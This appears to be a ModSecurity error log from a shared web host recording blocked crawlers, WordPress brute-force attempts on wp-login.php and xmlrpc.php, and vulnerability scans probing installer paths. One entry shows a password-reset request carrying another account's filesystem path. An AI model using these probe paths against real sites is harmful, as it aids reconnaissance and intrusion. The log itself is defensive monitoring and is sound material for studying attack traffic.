[Tue May 26 17:24:15.224809 2026] [security2:error] [pid 882219:tid 882383] [client 85.208.96.206:31556] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/page/4/"] [unique_id "ahWJ558tTkZcqimiXcT5LgAAAKc"]
[Tue May 26 17:24:15.224933 2026] [security2:error] [pid 882219:tid 882383] [client 85.208.96.206:31556] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/page/4/"] [unique_id "ahWJ558tTkZcqimiXcT5LgAAAKc"]
[Tue May 26 17:24:15.556939 2026] [security2:error] [pid 882219:tid 882374] [client 20.206.67.134:8668] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.jhonweb.com"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahWJ558tTkZcqimiXcT5NgAAAJ4"]
[Tue May 26 17:24:16.636923 2026] [security2:error] [pid 882219:tid 882465] [client 160.250.132.165:49363] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cpanel.ucdc.co.in"] [uri "/wp-login.php"] [unique_id "ahWJ6J8tTkZcqimiXcT5TwAAAPk"]
[Tue May 26 17:24:17.307987 2026] [security2:error] [pid 882219:tid 882449] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJ6J8tTkZcqimiXcT5WQAAAOk"]
[Tue May 26 17:24:18.335926 2026] [security2:error] [pid 882219:tid 882397] [client 160.250.132.165:50320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "e7.org.br.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWJ6p8tTkZcqimiXcT5ewAAALU"]
[Tue May 26 17:24:19.338328 2026] [security2:error] [pid 882219:tid 882400] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJ6p8tTkZcqimiXcT5hQAAALg"]
[Tue May 26 17:24:20.330607 2026] [security2:error] [pid 882219:tid 882452] [client 160.250.132.165:51350] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "testeweb.top.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWJ7J8tTkZcqimiXcT5rgAAAOw"]
[Tue May 26 17:24:20.635660 2026] [security2:error] [pid 882219:tid 882375] [client 54.205.63.235:53057] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ktmadvance-senegal.com"] [uri "/wp-admin/setup-config.php"] [unique_id "ahWJ7J8tTkZcqimiXcT5wgAAAJ8"]
[Tue May 26 17:24:20.662815 2026] [security2:error] [pid 882219:tid 882311] [remote 5.42.158.148:58892] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWJ7J8tTkZcqimiXcT5wQAArVs"]
[Tue May 26 17:24:20.733182 2026] [security2:error] [pid 882219:tid 882468] [client 54.205.63.235:53538] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ktmadvance-senegal.com"] [uri "/old/wp-admin/setup-config.php"] [unique_id "ahWJ7J8tTkZcqimiXcT5xgAAAPw"]
[Tue May 26 17:24:20.733904 2026] [security2:error] [pid 882219:tid 882427] [client 54.205.63.235:53541] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ktmadvance-senegal.com"] [uri "/staging/wp-admin/setup-config.php"] [unique_id "ahWJ7J8tTkZcqimiXcT5ygAAANM"]
[Tue May 26 17:24:20.734127 2026] [security2:error] [pid 882219:tid 882468] [client 54.205.63.235:53545] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ktmadvance-senegal.com"] [uri "/old/wp-admin/install.php"] [unique_id "ahWJ7J8tTkZcqimiXcT5zgAAAPw"]
[Tue May 26 17:24:20.734181 2026] [security2:error] [pid 882219:tid 882455] [client 54.205.63.235:53537] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ktmadvance-senegal.com"] [uri "/wordpress/wp-admin/setup-config.php"] [unique_id "ahWJ7J8tTkZcqimiXcT5xwAAAO8"]
[Tue May 26 17:24:20.734270 2026] [security2:error] [pid 882219:tid 882433] [client 54.205.63.235:53544] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ktmadvance-senegal.com"] [uri "/wordpress/wp-admin/install.php"] [unique_id "ahWJ7J8tTkZcqimiXcT5zAAAANk"]
[Tue May 26 17:24:20.734362 2026] [security2:error] [pid 882219:tid 882420] [client 54.205.63.235:53542] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ktmadvance-senegal.com"] [uri "/backup/wp-admin/setup-config.php"] [unique_id "ahWJ7J8tTkZcqimiXcT5zQAAAMw"]
[Tue May 26 17:24:20.734443 2026] [security2:error] [pid 882219:tid 882456] [client 54.205.63.235:53539] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ktmadvance-senegal.com"] [uri "/wp/wp-admin/setup-config.php"] [unique_id "ahWJ7J8tTkZcqimiXcT5yAAAAPA"]
[Tue May 26 17:24:20.734506 2026] [security2:error] [pid 882219:tid 882393] [client 54.205.63.235:53543] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ktmadvance-senegal.com"] [uri "/wp-admin/install.php"] [unique_id "ahWJ7J8tTkZcqimiXcT5ywAAALE"]
[Tue May 26 17:24:20.735224 2026] [security2:error] [pid 882219:tid 882471] [client 54.205.63.235:53540] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ktmadvance-senegal.com"] [uri "/wordpress1/wp-admin/setup-config.php"] [unique_id "ahWJ7J8tTkZcqimiXcT5yQAAAP8"]
[Tue May 26 17:24:20.735238 2026] [security2:error] [pid 882219:tid 882468] [client 54.205.63.235:53549] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ktmadvance-senegal.com"] [uri "/backup/wp-admin/install.php"] [unique_id "ahWJ7J8tTkZcqimiXcT50gAAAPw"]
[Tue May 26 17:24:20.735343 2026] [security2:error] [pid 882219:tid 882427] [client 54.205.63.235:53548] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ktmadvance-senegal.com"] [uri "/wp/wp-admin/install.php"] [unique_id "ahWJ7J8tTkZcqimiXcT50QAAANM"]
[Tue May 26 17:24:20.735840 2026] [security2:error] [pid 882219:tid 882356] [client 54.205.63.235:53546] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ktmadvance-senegal.com"] [uri "/staging/wp-admin/install.php"] [unique_id "ahWJ7J8tTkZcqimiXcT5zwAAAIw"]
[Tue May 26 17:24:20.735892 2026] [security2:error] [pid 882219:tid 882365] [client 54.205.63.235:53550] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ktmadvance-senegal.com"] [uri "/demo/wp-admin/install.php"] [unique_id "ahWJ7J8tTkZcqimiXcT50AAAAJU"]
[Tue May 26 17:24:20.736267 2026] [security2:error] [pid 882219:tid 882387] [client 54.205.63.235:53547] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ktmadvance-senegal.com"] [uri "/wordpress1/wp-admin/install.php"] [unique_id "ahWJ7J8tTkZcqimiXcT50wAAAKs"]
[Tue May 26 17:24:20.864391 2026] [security2:error] [pid 882219:tid 882376] [client 54.205.63.235:53670] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ktmadvance-senegal.com"] [uri "/test/wp-admin/install.php"] [unique_id "ahWJ7J8tTkZcqimiXcT51wAAAKA"]
[Tue May 26 17:24:21.173216 2026] [security2:error] [pid 882219:tid 882453] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJ7J8tTkZcqimiXcT5xQAAAO0"]
[Tue May 26 17:24:22.332315 2026] [security2:error] [pid 882219:tid 882420] [client 160.250.132.165:52550] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahWJ7p8tTkZcqimiXcT6BAAAAMw"]
[Tue May 26 17:24:23.592280 2026] [security2:error] [pid 882219:tid 882360] [client 203.194.101.7:54645] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWJ758tTkZcqimiXcT6JgAAAJA"]
[Tue May 26 17:24:23.592406 2026] [security2:error] [pid 882219:tid 882360] [client 203.194.101.7:54645] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWJ758tTkZcqimiXcT6JgAAAJA"]
[Tue May 26 17:24:24.079865 2026] [security2:error] [pid 882219:tid 882355] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJ758tTkZcqimiXcT6KQAAAIs"]
[Tue May 26 17:24:24.194949 2026] [security2:error] [pid 882219:tid 882476] [client 160.250.132.165:53603] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "user-helps.info.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWJ8J8tTkZcqimiXcT6OQAAAQQ"]
[Tue May 26 17:24:24.546335 2026] [security2:error] [pid 882219:tid 882380] [client 223.235.98.214:20645] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWJ8J8tTkZcqimiXcT6PQAAAKQ"]
[Tue May 26 17:24:24.546488 2026] [security2:error] [pid 882219:tid 882380] [client 223.235.98.214:20645] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWJ8J8tTkZcqimiXcT6PQAAAKQ"]
[Tue May 26 17:24:24.674416 2026] [security2:error] [pid 882219:tid 882289] [remote 74.7.241.58:47748] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahWJ8J8tTkZcqimiXcT6SAAAwUU"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/nationspioneer.com/wp-admin
[Tue May 26 17:24:25.121384 2026] [security2:error] [pid 882219:tid 882442] [client 14.179.47.106:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJ8J8tTkZcqimiXcT6RwAAAOI"]
[Tue May 26 17:24:25.988640 2026] [security2:error] [pid 882219:tid 882464] [client 160.250.132.165:54673] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "vibrantengineering.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWJ8Z8tTkZcqimiXcT6cwAAAPg"]
[Tue May 26 17:24:26.365301 2026] [security2:error] [pid 882219:tid 882446] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJ8Z8tTkZcqimiXcT6cgAAAOY"]
[Tue May 26 17:24:28.067265 2026] [security2:error] [pid 882219:tid 882410] [client 160.250.132.165:55813] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "valodico.com"] [uri "/wp-login.php"] [unique_id "ahWJ9J8tTkZcqimiXcT6pwAAAMI"]
[Tue May 26 17:24:28.775739 2026] [security2:error] [pid 882219:tid 882344] [remote 178.104.164.71:45972] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.164.104.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWJ9J8tTkZcqimiXcT6vAAA5nw"]
[Tue May 26 17:24:28.856207 2026] [security2:error] [pid 882219:tid 882433] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJ9J8tTkZcqimiXcT6tAAAANk"]
[Tue May 26 17:24:29.340410 2026] [security2:error] [pid 882219:tid 882329] [remote 209.42.18.223:52882] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 223.18.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "tea.canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWJ9Z8tTkZcqimiXcT6ygABAW0"]
[Tue May 26 17:24:30.116813 2026] [security2:error] [pid 882219:tid 882429] [client 160.250.132.165:56981] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "onesoft.in"] [uri "/wp-login.php"] [unique_id "ahWJ9p8tTkZcqimiXcT65gAAANU"]
[Tue May 26 17:24:30.645169 2026] [security2:error] [pid 882219:tid 882379] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJ9p8tTkZcqimiXcT66QAAAKM"]
[Tue May 26 17:24:30.983944 2026] [security2:error] [pid 882219:tid 882320] [remote 14.161.17.36:45426] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 36.17.161.14.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonweb.com"] [uri "/wp-login.php"] [unique_id "ahWJ9p8tTkZcqimiXcT69gAApGQ"]
[Tue May 26 17:24:32.205933 2026] [security2:error] [pid 882219:tid 882386] [client 160.250.132.165:58155] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/wp-login.php"] [unique_id "ahWJ-J8tTkZcqimiXcT7GQAAAKo"]
[Tue May 26 17:24:33.814123 2026] [security2:error] [pid 882219:tid 882380] [client 203.194.101.7:54968] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWJ-Z8tTkZcqimiXcT7RgAAAKQ"]
[Tue May 26 17:24:33.814250 2026] [security2:error] [pid 882219:tid 882380] [client 203.194.101.7:54968] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWJ-Z8tTkZcqimiXcT7RgAAAKQ"]
[Tue May 26 17:24:34.059568 2026] [security2:error] [pid 882219:tid 882453] [client 223.235.98.214:14896] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWJ-p8tTkZcqimiXcT7SAAAAO0"]
[Tue May 26 17:24:34.059722 2026] [security2:error] [pid 882219:tid 882453] [client 223.235.98.214:14896] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWJ-p8tTkZcqimiXcT7SAAAAO0"]
[Tue May 26 17:24:34.253698 2026] [security2:error] [pid 882219:tid 882414] [client 160.250.132.165:59322] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWJ-p8tTkZcqimiXcT7UQAAAMY"]
[Tue May 26 17:24:35.138822 2026] [security2:error] [pid 882219:tid 882258] [remote 45.79.189.31:44102] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.189.79.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/wp-login.php"] [unique_id "ahWJ-p8tTkZcqimiXcT7XwABAyY"]
[Tue May 26 17:24:35.754425 2026] [security2:error] [pid 882219:tid 882442] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJ-58tTkZcqimiXcT7bgAAAOI"]
[Tue May 26 17:24:36.025951 2026] [security2:error] [pid 882219:tid 882393] [client 160.250.132.165:60316] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWJ_J8tTkZcqimiXcT7gAAAALE"]
[Tue May 26 17:24:36.694677 2026] [security2:error] [pid 882219:tid 882244] [remote 95.216.117.13:55694] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWJ_J8tTkZcqimiXcT7jQABAhg"]
[Tue May 26 17:24:37.898781 2026] [security2:error] [pid 882219:tid 882388] [client 160.250.132.165:61378] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "mail.thegritfactory.in.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWJ_Z8tTkZcqimiXcT7ugAAAKw"]
[Tue May 26 17:24:37.919358 2026] [security2:error] [pid 882219:tid 882449] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWJ_Z8tTkZcqimiXcT7sgAAAOk"]
[Tue May 26 17:24:39.432678 2026] [security2:error] [pid 882219:tid 882239] [remote 65.2.90.30:52152] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.90.2.65.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWJ_58tTkZcqimiXcT73QAA8hM"]
[Tue May 26 17:24:39.753456 2026] [security2:error] [pid 882219:tid 882402] [client 160.250.132.165:62445] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "msjexim.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWJ_58tTkZcqimiXcT75AAAALo"]
[Tue May 26 17:24:40.102392 2026] [security2:error] [pid 882219:tid 882259] [remote 94.76.235.103:38146] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWJ_58tTkZcqimiXcT76AAAvSc"]
[Tue May 26 17:24:40.526887 2026] [security2:error] [pid 882219:tid 882388] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKAJ8tTkZcqimiXcT79AAAAKw"]
